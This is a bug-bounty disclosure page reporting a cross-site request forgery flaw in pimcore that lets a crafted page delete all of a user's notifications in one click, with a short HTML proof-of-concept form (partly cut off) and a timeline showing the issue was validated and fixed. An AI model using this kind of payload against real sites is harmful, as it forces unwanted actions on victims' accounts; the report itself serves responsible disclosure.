Cross-Site Request Forgery (CSRF) in pimcore/pimcore


Reported on

Jul 30th 2021

✍️ Description

Your application have not any CSRF protection and also You set the SameSite attribute to Lax, this means if you want to alter some data with GET HTTP requests, then your site should be vulnerable to CSRF attacks with no doubt.

First you run this Html payload and then you should see that the all notifications been deleted .

🕵️‍♂️ Proof of Concept

// PoC.html

<script>history.pushState('', '', '/')</script>
<form action="">
<input type="hidden" name="&#95;dc" value="" />
<input type="submit" value="Submit request" />

I test this Payload on both stable and dev Editions.(on

💥 Impact

This vulnerability is capable of delete any notification only with one click.


We have contacted a member of the pimcore team and are waiting to hear back 2 years ago
Bernhard Rusch validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch marked this as fixed with commit 80713c 2 years ago
Bernhard Rusch has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation